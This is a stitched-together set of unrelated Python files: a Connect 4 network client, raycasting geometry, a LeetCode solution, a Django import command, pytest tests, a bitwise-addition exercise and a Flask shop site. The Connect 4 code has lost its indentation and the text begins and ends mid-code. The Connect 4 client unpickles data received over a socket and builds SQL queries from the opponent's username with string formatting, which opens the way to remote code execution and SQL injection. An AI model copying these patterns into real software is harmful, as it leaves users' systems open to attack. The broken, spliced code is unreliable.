+ str(msg[0]) + ' , Error message : '
+ msg[1]
)
self.needProcessing = []
self.BOX_WIDTH = 70
self.inPort = 8887
self.outPort = 8888
self.gameBoard = [[0 for __ in range(6)] for _ in range(7)] #gameboard[col][row]
self.moves = ""
self.turn = 1
self.colors = ("black", "red")
self.gameOver = False
self.initSockets()
self.initDatabase()
self.initUI()
def initSockets(self):
self.inThread = threading.Thread(target=lambda:self.inRunner())
self.inThread.daemon = True
self.inThread.start()
self.outInitThread = threading.Thread(target=lambda:self.initOutSock())
self.outInitThread.daemon = True
self.outInitThread.start()
def initDatabase(self):
self.databaseConn = psycopg2.connect(database="connect4", user="anthonydito")
self.databaseCurr = self.databaseConn.cursor()
def initOutSock(self):
try:
self.outsock.bind(("0.0.0.0", self.outPort))
self.outsock.listen(1)
self.outConn, addr = self.outsock.accept()
logging.info("Connected with " + addr[0] + ":" + str(addr[1]))
except Exception, e:
logging.debug(e)
#Might want to put some other code here.
def initUI(self):
self.parent.title("AI Connect 4 - Anthony Dito")
self.pack(fill=BOTH, expand=1)
for col in range(7):
b = Button(self, command=lambda col=col:self.move(col, 1), width=6)
b.place(x=44+(col * self.BOX_WIDTH), y=15)
w = self.BOX_WIDTH * 7
h = self.BOX_WIDTH * 6
self.can = Canvas(self, width=w+20, height=h+20)
for i in range(8):
self.can.create_line(4+i*self.BOX_WIDTH, 0, 4 + i * self.BOX_WIDTH, h+4, width = 2)
for i in range(7):
self.can.create_line(0, 4+i*self.BOX_WIDTH, w+4, 4+i*self.BOX_WIDTH, width =2)
self.can.place(x=40, y=40)
self.textBoxUserMessage = Text(self, height=13, width=50)
self.textBoxUserMessage.place(x=w+60, y=50)
self.textBoxUserMessage.config(state=DISABLED, background="snow2")
self.textBoxSystemMessage = Text(self, height=13, width=50)
self.textBoxSystemMessage.place(x=w+60, y=260)
self.textBoxSystemMessage.config(state=DISABLED, background="snow2")
self.e = Entry(self, width=40)
self.e.place(x=w+60, y=20)
self.b = Button(self, command=lambda:self.sendAndCreateDialogMessage(), text="send")
self.b.place(x=w+355, y=20)
self.e2 = Entry(self, width=40)
self.e2.place(x=w+420, y =20)
self.b2 = Button(self, command=lambda:self.sendVoiceMessage(), text="talk")
self.b2.place(x=w+715, y=20)
self.textBoxDatabaseInfo = Text(self, height=29, width=50)
self.textBoxDatabaseInfo.place(x=w+420, y=50)
self.textBoxDatabaseInfo.config(state=DISABLED, background="snow2")
self.parent.geometry("1300x550+100+100")
def redoCanvas(self):
w = self.BOX_WIDTH * 7
h = self.BOX_WIDTH * 6
for i in range(8):
self.can.create_line(4+i*self.BOX_WIDTH, 0, 4 + i * self.BOX_WIDTH, h+4, width = 2)
for i in range(7):
self.can.create_line(0, 4+i*self.BOX_WIDTH, w+4, 4+i*self.BOX_WIDTH, width=2)
def resetGUI(self):
self.textBoxDatabaseInfo.config(state=NORMAL)
self.textBoxDatabaseInfo.delete("1.0", END)
self.textBoxDatabaseInfo.config(state=DISABLED)
self.textBoxSystemMessage.config(state=NORMAL)
self.textBoxSystemMessage.delete("1.0", END)
self.textBoxSystemMessage.config(state=DISABLED)
self.textBoxUserMessage.config(state=NORMAL)
self.textBoxUserMessage.delete("1.0", END)
self.textBoxUserMessage.config(state=DISABLED)
self.can.delete("all")
self.redoCanvas()
self.e.delete(0, END)
self.e2.delete(0, END)
def ai(self):
t = threading.Thread(target=lambda:self.runAi())
t.daemon = True
t.name = "db_thread"
t.start()
def runAi(self):
IS_OPPONENT_MULTIPLIER = 2
self.databaseCurr.execute("SELECT outcome, user_against, moves FROM games WHERE moves LIKE '%s%%'" % self.moves)
row = self.databaseCurr.fetchone()
if row == None:
self.displayNoInfoMessage()
return
#0 - number of ties, 1 - number of wins, 2 - number of losses, 3-score, 4 - number with user matching
columnInfo = [[0 for __ in range(5)] for _ in range(7)]
while row != None:
outcome = row[0]
user_against = row[1]
moves = row[2]
lenGameMoves = len(self.moves)
if (len(moves) - lenGameMoves <= 1):
self.displayWinMove(moves[lenGameMoves])
return
nextMove = int(moves[lenGameMoves])
if outcome == 0:
columnInfo[nextMove][0] += 1
elif outcome == 1:
columnInfo[nextMove][1] += 1
score = 50
score -= (len(moves) - lenGameMoves)
if user_against == self.opponentUsername:
score *= IS_OPPONENT_MULTIPLIER
columnInfo[nextMove][4] += 1
columnInfo[nextMove][3] += score
elif outcome == 2:
columnInfo[nextMove][2] += 1
score = -50
score += (len(moves) - lenGameMoves)
if user_against == self.opponentUsername:
score *= IS_OPPONENT_MULTIPLIER
columnInfo[nextMove][4] += 1
columnInfo[nextMove][3] += score
row = self.databaseCurr.fetchone()
self.textBoxDatabaseInfo.config(state = NORMAL)
self.textBoxDatabaseInfo.delete("1.0", END)
sumTotals = 0
for idx, col in enumerate(columnInfo):
ties = col[0]
wins = col[1]
losses = col[2]
score = col[3]
numberWithUser = col[4]
total = (ties + wins + losses)
sumTotals += total
line1 = "Column %d - total: %d - v. opponent: %d\n" % (idx, total, numberWithUser)
line2 = "ties: %d - wins: %d - losses: %d\n" % (ties, wins, losses)
line3 = "score: %d\n" % score
line4 = "------------------------------\n"
self.textBoxDatabaseInfo.insert(END, line1)
self.textBoxDatabaseInfo.insert(END, line2)
self.textBoxDatabaseInfo.insert(END, line3)
self.textBoxDatabaseInfo.insert(END, line4)
self.textBoxDatabaseInfo.config(state = DISABLED)
self.insertSystemMessage("Found %d in database." % sumTotals)
def displayWinMove(self, col):
self.insertSystemMessage("THERE IS A WINNING MOVE AT " + col)
self.textBoxDatabaseInfo.config(state=NORMAL)
self.textBoxDatabaseInfo.delete("1.0", END)
self.textBoxDatabaseInfo.insert("1.0", "THERE IS A WINNING MOVE AT " + col)
self.textBoxDatabaseInfo.config(state=NORMAL)
def inRunner(self):
try:
self.insock.bind(("0.0.0.0", self.inPort))
self.insock.listen(1)
self.inConn, addr = self.insock.accept()
logging.info("Connected with " + addr[0] + ":" + str(addr[1]))
while True:
reply = self.inConn.recv(4096)
self.messageProcessor(reply)
except Exception, e:
logging.debug(e)
def messageProcessor(self, encodedMessage):
message = cPickle.loads(encodedMessage)
code = message[0]
if code == 4:
col = message[1]
self.move(col, 2)
elif code == 2:
dialogMessage = message[1]
self.insertDialogMessage(self.opponentUsername + ": " + dialogMessage)
elif code == 7:
self.opponentUsername = message[1]
self.insertSystemMessage("Playing: " + self.opponentUsername)
self.ai()
elif code == 8:
self.askNewGame()
def sendAndCreateDialogMessage(self):
message = self.e.get()
if len(message) > 0:
self.e.delete(0, END)
self.insertDialogMessage("You: " + message)
self.sendMessage((2, message))
def sendVoiceMessage(self):
message = self.e2.get()
if len(message) > 0:
self.e2.delete(0, END)
self.insertSystemMessage("Sent voice: " + message)
self.sendMessage((6, message))
def sendMessage(self, message):
pickledMessage = cPickle.dumps(message, protocol=0)
self.outConn.sendall(pickledMessage)
def insertSystemMessage(self, message):
self.textBoxSystemMessage.config(state=NORMAL)
self.textBoxSystemMessage.insert("1.0", message + "\n")
self.textBoxSystemMessage.config(state=DISABLED)
def insertDialogMessage(self, message):
self.textBoxUserMessage.config(state=NORMAL)
self.textBoxUserMessage.insert("1.0", message + "\n")
self.textBoxUserMessage.config(state=DISABLED)
def displayNoInfoMessage(self):
self.textBoxDatabaseInfo.config(state = NORMAL)
self.textBoxDatabaseInfo.delete("1.0", END)
self.textBoxDatabaseInfo.insert("1.0", "NO INFO")
self.textBoxDatabaseInfo.config(state=DISABLED)
def move(self, col, user):
if self.gameOver:
return
if user != self.turn:
if user == 1:
self.insertSystemMessage("It is not your turn.")
return
else:
self.insertSystemMessage("Opponent attempted move and was denied.")
self.sendMessage((1, "It is not your turn."))
return
for spot, value in enumerate(reversed(self.gameBoard[col])):
spot = 5 - spot
if (value == 0):
#spot is the row
self.makeTheMove(col, spot, user)
return
if user == 1:
self.insertSystemMessage("That is not a valid move.")
else:
self.sendMessage((1, "That is not a valid move"))
def makeTheMove(self, col, row, user):
self.sendMessage((0, col, row, user))
self.gameBoard[col][row] = user
self.moves += str(col)
self.can.create_oval(
4+(col*self.BOX_WIDTH),
4+(row*self.BOX_WIDTH),
4+((col + 1)*self.BOX_WIDTH),
4+((row + 1)*(self.BOX_WIDTH)),
fill=self.colors[user-1],
outline=self.colors[user-1],
)
self.switchUser()
winner = self.checkWinner()
if winner != -1:
self.endGame(winner)
elif self.turn == 1:
self.ai()
def checkWinner(self):
foundZero = False
for col in range(7):
if self.gameBoard[col][0] == 0:
foundZero = True
break
if not foundZero:
return 0
for row in range(6):
currPiece = -1
currStreak = 0
for col in range(7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak == 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
for col in range(7):
currPiece = -1
currStreak = 0
for row in range(6):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
#This is a forward diagnol like a frontslash
for row in range(3):
col = 0
currPiece = -1
currStreak = 0
while (row < 6 and col < 7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
row += 1
col += 1
for col in range(1, 4):
row = 0
currPiece = -1
currStreak = 0
while (row < 6 and col < 7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
row += 1
col += 1
#This is checking like a backslash
for row in reversed(range(3, 6)):
col = 0
currPiece = -1
currStreak = 0
while (row >= 0 and col < 7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
row -= 1
col += 1
for col in range(4):
row = 5
currPiece = -1
currStreak = 0
while (row >= 0 and col < 7):
piece = self.gameBoard[col][row]
if piece == currPiece:
currStreak += 1
if currStreak >= 4:
return piece
elif piece != 0:
currPiece = piece
currStreak = 1
else:
currPiece = -1
currStreak = 0
row -= 1
col += 1
return -1
def switchUser(self):
if self.turn == 1:
self.turn = 2
else:
self.turn = 1
def endGame(self, outcome):
self.insertGameInDatabase(outcome)
self.gameOver = True
self.insertSystemMessage("THE GAME IS OVER")
results = self.getRecordAgainstOpponent()
returnMessage = (3, outcome) + results
self.sendMessage(returnMessage)
if outcome == 0:
self.insertSystemMessage("THE GAME IS A TIE")
elif outcome == 1:
self.insertSystemMessage("YOU WON THE GAME!!!")
else:
self.insertSystemMessage("YOU LOST")
self.insertSystemMessage("Wins: %d - Losses: %d - Ties: %d" % (results[0], results[1], results[2]))
def getRecordAgainstOpponent(self):
numWins = 0
numLosses = 0
numTies = 0
self.databaseCurr.execute(
"SELECT outcome FROM games WHERE user_against = '%s'" % self.opponentUsername
)
resultList = [i[0] for i in self.databaseCurr.fetchall()]
for result in resultList:
if result == 0:
numTies += 1
elif result == 1:
numWins += 1
else:
numLosses += 1
return (numWins, numLosses, numTies)
def insertGameInDatabase(self, outcome):
self.databaseCurr.execute(
"INSERT INTO games (moves, user_against, outcome) VALUES('%s', '%s', %d)" % (self.moves, self.opponentUsername, outcome)
)
self.databaseConn.commit()
def askNewGame(self):
self.wantNewGameTop = Toplevel()
l1 = Label(self.wantNewGameTop, text="%s wants a rematch" % self.opponentUsername)
l1.pack()
b_yes = Button(self.wantNewGameTop, text="accept", command=lambda:self.acceptNewGame())
b_yes.pack()
b_no = Button(self.wantNewGameTop, text="deny", command=lambda:self.denyNewGame())
b_no.pack()
def acceptNewGame(self):
self.wantNewGameTop.destroy()
self.sendMessage((9, True))
self.resetGUI()
self.turn = 1
self.gameBoard = [[0 for __ in range(6)] for _ in range(7)]
self.moves = ""
self.gameOver = False
self.ai()
self.insertSystemMessage("NEW GAME STARTED")
    def denyNewGame(self):
        """Decline the rematch: tell the peer, close the dialog, quit the app."""
        # Send before tearing down the windows so the message still goes out.
        self.sendMessage((9, False))
        self.wantNewGameTop.destroy()
        self.parent.destroy()
# Script entry point: build the Tk root window and start the AI-opponent client.
if __name__ == '__main__':
    root = Tk()
    s = aiUser(root)
    root.mainloop()
import math
import numpy as np
import numba as nb
from numpy import array
@nb.njit(fastmath=True)
def distance(p1: array, p2: array) -> array:
    """Euclidean distance between two 2-D points given as arrays."""
    dx = p1[0] - p2[0]
    dy = p1[1] - p2[1]
    return np.sqrt(dx * dx + dy * dy)
def right_or_left(p0, p1, vec0):
    """Return 1 if p1 is on/left of the ray from p0 along vec0, else -1.

    The sign comes from the 2-D cross product of vec0 and (p1 - p0); a zero
    cross product (collinear) counts as "left" (returns 1), matching the
    original np.cross-based test.
    """
    vec1 = p1 - p0
    # Explicit 2-D cross product: np.cross on 2-D inputs is deprecated in
    # recent NumPy releases.
    cross = vec0[0] * vec1[1] - vec0[1] * vec1[0]
    return 1 if cross >= 0 else -1
@nb.njit(fastmath=True)
def unit_vector(angle: int) -> array:
    """Unit direction vector for an angle given in degrees."""
    rad = angle / 180 * math.pi
    return array([math.cos(rad), math.sin(rad)])
def rotate_vector(vec: array) -> array:
    """Rotate a 2-D vector 90 degrees clockwise: (x, y) -> (y, -x)."""
    x, y = vec[0], vec[1]
    return array([y, -x])
def lines_to_points(lines: list [array, array]) -> list [array]:
    """Flatten a list of (start, end) line pairs into a flat list of points."""
    return [point for line in lines for point in line]
def prove_circle_intersection(pos, ray, circle):
    """Check whether the infinite line through pos along ray hits the circle.

    circle is a (center, radius) pair.  Projects the center onto the ray
    line; the line intersects when that closest point is within radius.
    Returns an explicit False on a miss (previously an implicit None, which
    is truthiness-compatible for all existing callers).
    """
    p0, r = circle
    vec0 = p0 - pos
    # Projection of the center onto the ray direction.
    vec1 = (np.dot(vec0, ray) / np.dot(ray, ray)) * ray
    p1 = pos + vec1
    if distance(p0, p1) <= r:
        return True
    return False
def visible_lines(lines, pos, angle, fov):
    """Return the lines with at least one endpoint in the forward half-plane.

    The half-plane test uses the normal at (angle + 90); ``fov`` is accepted
    for interface compatibility but the effective field of view is 180
    degrees.
    """
    normal = unit_vector(angle + 90)
    visible = []
    for line in lines:
        in_front = (right_or_left(pos, line[0], normal) < 0 or
                    right_or_left(pos, line[1], normal) < 0)
        if in_front:
            visible.append(line)
    return visible
def visible_points(points, pos, angle, fov):
    """Return the points lying strictly inside the field-of-view wedge."""
    left_edge = unit_vector(angle - fov / 2)
    right_edge = unit_vector(angle + fov / 2)
    return [point for point in points
            if right_or_left(pos, point, left_edge) > 0
            and right_or_left(pos, point, right_edge) < 0]
@nb.njit
def line_raycast(ray_point, angle, lines, fov, nrays, dangle, max_length):
    """Cast nrays rays from ray_point across the fov against line segments.

    Returns one hit point per ray: the nearest line intersection, or a point
    max_length away along the ray when nothing is hit.
    """
    points = []
    # Start half an fov to the left; note the first ray is already offset by
    # dangle because the increment happens before the first cast.
    ang = angle - fov // 2
    for _ in range(nrays):
        ang += dangle
        vec = unit_vector(ang)
        min_dist = 10e10
        # Fallback hit point, max_length out along the ray.
        nearest_point = vec * max_length + ray_point
        for line in lines:
            point = line_intersection(ray_point, vec, line)
            if point is not None:
                new_dist = distance(ray_point, point)
                if new_dist < min_dist:
                    min_dist = new_dist
                    nearest_point = point
        points.append(nearest_point)
    return points
@nb.njit
def line_intersection(pos: array, ray: array, line: list [array]):
    """Intersect the ray starting at pos with a line segment.

    Standard parametric two-line formulation: t is the position along the
    segment (valid in [0, 1]); u is the distance along the ray (valid when
    >= 0, i.e. in front of pos).  Returns the hit point as an array, or
    None when the lines are parallel or the hit is out of range.
    """
    x1, y1 = line[0]
    x2, y2 = line[1]
    x3, y3 = pos
    x4, y4 = pos + ray
    den = (x1 - x2) * (y3 - y4) - (y1 - y2) * (x3 - x4)
    # Parallel (or degenerate) -- no intersection.
    if den == 0:
        return
    t = ((x1 - x3) * (y3 - y4) - (y1 - y3) * (x3 - x4)) / den
    # Intersection lies outside the segment.
    if t > 1 or t < 0:
        return
    u = -((x1 - x2) * (y1 - y3) - (y1 - y2) * (x1 - x3)) / den
    # Intersection is behind the ray origin.
    if u < 0:
        return
    x = x1 + t * (x2 - x1)
    y = y1 + t * (y2 - y1)
    return array([x, y])
def circle_intersection(pos: array, ray: array, circle) -> array:
    """Intersect the ray from pos with a circle given as (center, radius).

    Solves the quadratic |pos + t*ray - center|^2 = r^2 and returns the
    nearest intersection in front of pos (t > 0), or None when the ray
    misses the circle or the circle lies entirely behind pos.

    Fixes: the discriminant was computed three times (now hoisted) and the
    ``circle`` parameter was mis-annotated as int.
    """
    p0, r = circle
    x0, y0 = pos
    x1, y1 = pos + ray
    h, k = p0
    a = (x1 - x0) ** 2 + (y1 - y0) ** 2
    b = 2 * (x1 - x0) * (x0 - h) + 2 * (y1 - y0) * (y0 - k)
    c = (x0 - h) ** 2 + (y0 - k) ** 2 - r ** 2
    disc = b ** 2 - 4 * a * c
    # No intersection.
    if disc < 0:
        return
    sqrt_disc = math.sqrt(disc)
    # Nearer root: entry point when pos is outside the circle.
    t1 = (-b - sqrt_disc) / (2 * a)
    if t1 > 0:
        return array([x0 + t1 * (x1 - x0), y0 + t1 * (y1 - y0)])
    # Farther root: exit point when pos is inside the circle.
    t2 = (-b + sqrt_disc) / (2 * a)
    if t2 > 0:
        return array([x0 + t2 * (x1 - x0), y0 + t2 * (y1 - y0)])
def circle_raycast(pos: array, angle: int, circles: list, fov, nrays, dangle, max_length):
    """Cast nrays rays against a list of (center, radius) circles.

    Returns one point per ray: the closest circle hit, or a point
    max_length away along the ray when nothing is hit.
    """
    hits = []
    ang = angle - fov // 2
    for _ in range(nrays):
        ang += dangle
        ray = unit_vector(ang)
        best_dist = 10e10
        best_point = ray * max_length + pos
        for circle in circles:
            hit = circle_intersection(pos, ray, circle)
            if hit is None:
                continue
            d = distance(pos, hit)
            if d < best_dist:
                best_dist = d
                best_point = hit
        hits.append(best_point)
    return hits
def raycast(pos, angle, fov, nrays, lines=None, circles=None):
    """Cast nrays rays against both line segments and circles.

    Returns one point per ray: the nearest hit among all obstacles, or a
    point 1000 units out along the ray when nothing is hit.

    ``lines`` / ``circles`` default to empty; the previous mutable-list
    defaults were a shared-state hazard (None defaults are call-compatible).
    """
    lines = [] if lines is None else lines
    circles = [] if circles is None else circles
    points = []
    dangle = fov / nrays
    ang = angle - fov // 2
    for _ in range(nrays):
        ang += dangle
        ray = unit_vector(ang)
        min_dist = 10e10
        nearest_point = ray * 1000 + pos
        # Circles and lines compete for the same nearest-hit slot.
        for circle in circles:
            point = circle_intersection(pos, ray, circle)
            if point is not None:
                new_dist = distance(pos, point)
                if new_dist < min_dist:
                    min_dist = new_dist
                    nearest_point = point
        for line in lines:
            point = line_intersection(pos, ray, line)
            if point is not None:
                new_dist = distance(pos, point)
                if new_dist < min_dist:
                    min_dist = new_dist
                    nearest_point = point
        points.append(nearest_point)
    return points
def main():
    """Placeholder entry point; this module is meant to be imported."""
# Allow running the module directly (main is currently a no-op).
if __name__ == '__main__':
    main()
class Solution(object):
    """Kth-largest-element solver (LeetCode 215)."""

    def findKthLargest(self, nums, k):
        """
        Return the k-th largest element of nums.

        :type nums: List[int]
        :type k: int
        :rtype: int

        Replaces the previous hand-rolled quickselect, which leaked debug
        prints and only worked through the class-as-self calling hack
        (``self.partition(self, nums)``).  A size-k heap gives O(n log k)
        without mutating the input, and works whether ``self`` is an
        instance or (as in the old script usage) the class itself.
        """
        import heapq
        return heapq.nlargest(k, nums)[-1]

    def partition(self, all):
        """
        Partition ``all`` (destructively emptied) around its last element.

        Returns (pivot, smaller_or_equal, larger, len_smaller, len_larger).
        Kept for backward compatibility; debug printing removed.
        """
        mid = all.pop()
        left = []
        right = []
        while all:
            x = all.pop()
            if x > mid:
                right.append(x)
            else:
                left.append(x)
        return mid, left, right, len(left), len(right)
if __name__ == "__main__":
    nums = [-1, -1]
    # NOTE(review): Solution is used as a class, not an instance, and self is
    # passed explicitly -- this works only because findKthLargest forwards
    # self the same way; the conventional call would be
    # Solution().findKthLargest(nums, 2).
    solu = Solution
    ans = solu.findKthLargest(solu, nums, 2)
    print(ans)
from apps.games import models
from django.core.management.base import BaseCommand
from django.db import IntegrityError
from django.utils.text import slugify
import rethinkdb as r
class Command(BaseCommand):
    """Import board-game records from RethinkDB into the local Django models."""

    help = 'Get count for all extra data'

    def handle(self, **options):
        """Copy every named game from the RethinkDB ``games.bgg`` table.

        Games already present (matched by name) are skipped; for new games
        the scalar fields are copied and the many-to-many metadata
        (categories, designers, artists, ...) is linked via _get_data.
        """
        r.connect().repl()
        for x in r.db('games').table('bgg').run():
            if not models.Game.objects.filter(name=x.get('name')).exists() and x.get('name'):
                g = models.Game()
                g.bgg = x.get('objectid')
                g.name = x.get('name')
                g.slug = slugify(x.get('name'))
                g.age = x.get('age')
                g.year_published = x.get('yearpublished')
                g.playing_time = x.get('playingtime')
                # Coerce a missing value to '' (field presumably not nullable).
                g.language_dependence = x.get('language_dependence') if x.get(
                    'language_dependence') else ''
                g.max_players = x.get('maxplayers')
                g.min_players = x.get('minplayers')
                g.rank = x.get('rank')
                g.image = x.get('image')
                g.thumbnail = x.get('thumbnail')
                g.bgg_url = x.get('url')
                g.average_rating = x.get('averagerating')
                g.num_ratings = x.get('numratings')
                g.fans = x.get('fans')
                g.total_plays = x.get('totalplays')
                g.plays_this_month = x.get('playsthismonth')
                g.users_owning = x.get('usersowning')
                g.users_trading = x.get('userstrading')
                g.users_wanting = x.get('userswanting')
                g.expansion = x.get('expansion')
                g.save()
                list_of = ['boardgamecategory', 'boardgamedesigner', 'boardgameartist',
                           'boardgamepublisher',
                           'boardgamemechanic', 'boardgamesubdomain', 'boardgamefamily']
                for cat in list_of:
                    item = x.get(cat)
                    if item:
                        self._get_data(g, item, cat)
                self.stdout.write(x.get('name'))
        self.stdout.write('Done')

    def _get_data(self, g, item, meta):
        """Link metadata entries of kind ``meta`` to game ``g``.

        Creates missing rows, de-duplicating slug collisions between
        distinct BGG objects with a roman-numeral suffix.  Fixed to use
        print() calls instead of Python-2-only print statements, so the
        module parses on both Python 2 and 3.
        """
        if 'artist' in meta:
            c = models.Artist
            insert = g.artist
        elif 'designer' in meta:
            c = models.Designer
            insert = g.designer
        elif 'publisher' in meta:
            c = models.Publisher
            insert = g.publisher
        elif 'category' in meta:
            c = models.Category
            insert = g.category
        elif 'mechanic' in meta:
            c = models.Mechanic
            insert = g.mechanic
        elif 'subdomain' in meta:
            c = models.Subdomain
            insert = g.subdomain
        elif 'family' in meta:
            c = models.Family
            insert = g.family
        else:
            return False
        for x in item:
            name = x.get('name')
            bgg = x.get('objectid')
            if name:
                slug = slugify(name)
                try:
                    data = c.objects.get(bgg=bgg)
                    insert.add(data)
                except c.DoesNotExist:
                    type_name = meta.replace('boardgame', '')
                    data = c(name=name, slug=slug, bgg=bgg, type=type_name)
                    try:
                        data.save()
                        insert.add(data)
                    except IntegrityError:
                        query = c.objects.filter(slug=slug).exists()
                        if query:
                            # Slug taken by a different BGG object: disambiguate.
                            num = c.objects.filter(slug=slug).count()
                            slug = '%s-%s' % (slug, self.int_to_roman(num + 1))
                            data = c(name=name, slug=slug, bgg=bgg, type=type_name)
                            try:
                                data.save()
                                insert.add(data)
                            except IntegrityError:
                                print('%s: %s - %s - %s' % (meta, name, slug, bgg))
                        else:
                            print('%s: %s - %s - %s' % (meta, name, slug, bgg))

    def int_to_roman(self, integer):
        """Return the roman-numeral representation of a positive integer."""
        returnstring = ''
        table = [['M', 1000], ['CM', 900], ['D', 500], ['CD', 400], ['C', 100], ['XC', 90],
                 ['L', 50],
                 ['XL', 40],
                 ['X', 10], ['IX', 9], ['V', 5], ['IV', 4], ['I', 1]]
        for pair in table:
            while integer - pair[1] >= 0:
                integer -= pair[1]
                returnstring += pair[0]
        return returnstring
import os
import helpers
import matplotlib.pyplot as plt
import numpy as np
import pytest
import disba
# Headless environments (no X display) need a non-interactive backend.
if not os.environ.get("DISPLAY", ""):
    plt.switch_backend("Agg")
@pytest.mark.parametrize(
    "mode, wave, algorithm",
    [
        (0, "rayleigh", "dunkin"),
        (0, "rayleigh", "fast-delta"),
        (1, "rayleigh", "dunkin"),
        (1, "rayleigh", "fast-delta"),
        (0, "love", "dunkin"),
        (1, "love", "dunkin"),
    ],
)
def test_resample(mode, wave, algorithm):
    """Resampling the model should leave the dispersion curve nearly unchanged."""
    model = helpers.velocity_model(5)
    periods = np.logspace(0.0, 1.0, 20)
    dispersion = disba.PhaseDispersion(*model, algorithm=algorithm)
    reference = dispersion(periods, mode, wave)
    dispersion.resample(0.1)
    resampled = dispersion(periods, mode, wave)
    assert np.allclose(reference.velocity.sum(), resampled.velocity.sum(), atol=0.1)
def test_depthplot(monkeypatch):
    """depthplot should run without opening a window (plt.show is stubbed out)."""
    monkeypatch.setattr(plt, "show", lambda: None)
    model = helpers.velocity_model(5)
    disba.depthplot(model[0], model[2])
"""
剑指 Offer 65. 不用加减乘除做加法
写一个函数,求两个整数之和,要求在函数体内不得使用 “+”、“-”、“*”、“/” 四则运算符号。
"""
def add1(a, b):
    """Sum via the builtin -- still no arithmetic operator in sight.

    Fixed: ``sum(a, b)`` raised TypeError because sum() expects an iterable
    as its first argument; wrapping the operands in a tuple makes it work.
    """
    return sum((a, b))
# Ha ha -- this one is only here as a joke.
def add(a, b):
    """
    Add two integers without using +, -, *, or / (Jianzhi Offer 65).

    Simulates 32-bit addition with bitwise ops: XOR is the carry-less sum,
    AND shifted left is the carry; loop until the carry is exhausted.

    :param a: first addend (any Python int; reduced to 32 bits)
    :param b: second addend
    :return: the 32-bit signed sum as a Python int

    Bug fixed: when the 32-bit result has the sign bit set it must be mapped
    back to a negative Python int -- Python ints are unbounded, so the raw
    masked value (e.g. 0xffffffff) is a large positive number, not -1.
    """
    x = 0xffffffff
    a = a & x
    b = b & x
    # XOR gives the per-bit sum; AND<<1 is the carry into the next bit.
    while b != 0:
        a, b = (a ^ b), (a & b) << 1 & x
    # Reinterpret the 32-bit pattern as a signed value.
    return a if a <= 0x7fffffff else ~(a ^ x)
# Quick smoke test when run as a script.
if __name__ == '__main__':
    res = add(1, 3)
    print(res)
from flask import Flask, render_template
# WSGI application object for the door-catalog site.
app = Flask(__name__)
@app.route("/")
def index():
title = "Мир дверей"
heading = "МЕЖКОМНАТНЫЕ СТЕКЛЯННЫЕ ДВЕРИ"
return render_template('index.html', page_title=title, heading=heading)
@app.route('/delivery')
def delivery():
    # Delivery information page.
    title = "Мир дверей"
    heading = "МЕЖКОМНАТНЫЕ СТЕКЛЯННЫЕ ДВЕРИ"
    return render_template('delivery.html', page_title=title, heading=heading)
@app.route('/glass')
def glass():
    # Glass doors catalog page.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ"
    return render_template('glass.html', page_title=title, heading=heading)
@app.route('/interior/single_light')
def single_light():
    # Interior product page: plain glass doors.
    title = "Мир дверей"
    heading = "ПРОСТЫЕ СТЕКЛЯННЫЕ ДВЕРИ"
    return render_template('interior/single_light.html', page_title=title, heading=heading)
@app.route('/interior/single_letters')
def single_letters():
    # Interior product page: LETTERS collection.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ LETTERS"
    return render_template('interior/single_letters.html', page_title=title, heading=heading)
@app.route('/interior/single_fantasy')
def single_fantasy():
    # Interior product page: FANTASY collection.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ FANTASY"
    return render_template('interior/single_fantasy.html', page_title=title, heading=heading)
@app.route('/interior/single_satin')
def single_satin():
    # Interior product page: SATIN collection.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ SATIN"
    return render_template('interior/single_satin.html', page_title=title, heading=heading)
@app.route('/interior/single_florid')
def single_florid():
    # Interior product page: FLORID collection.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ FLORID"
    return render_template('interior/single_florid.html', page_title=title, heading=heading)
@app.route('/interior/single_tripleks')
def single_tripleks():
    # Interior product page: triplex (laminated) glass doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ ТРИПЛЕКС"
    return render_template('interior/single_tripleks.html', page_title=title, heading=heading)
@app.route('/interior/single_illusion')
def single_illusion():
    # Interior product page: ILLUSION collection.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ ILLUSION"
    return render_template('interior/single_illusion.html', page_title=title, heading=heading)
@app.route('/interior/single_classic')
def single_classic():
    # Interior product page: classic-style glass doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ В КЛАССИЧЕСКОМ СТИЛЕ"
    return render_template('interior/single_classic.html', page_title=title, heading=heading)
@app.route('/interior/single_flowers')
def single_flowers():
    # Interior product page: FLOWERS collection.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ FLOWERS"
    return render_template('interior/single_flowers.html', page_title=title, heading=heading)
@app.route('/interior/single_foto')
def single_foto():
    # Interior product page: photo-printed glass doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ С ФОТОПЕЧАТЬЮ"
    return render_template('interior/single_foto.html', page_title=title, heading=heading)
@app.route('/interior/single_mirra')
def single_mirra():
    # Interior product page: MIRRA collection.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ MIRRA"
    return render_template('interior/single_mirra.html', page_title=title, heading=heading)
@app.route('/interior/single_loft')
def single_loft():
    # Interior product page: loft-style glass doors.
    title = "Мир дверей"
    heading = "СТЕКЛЯННЫЕ ДВЕРИ ЛОФТ"
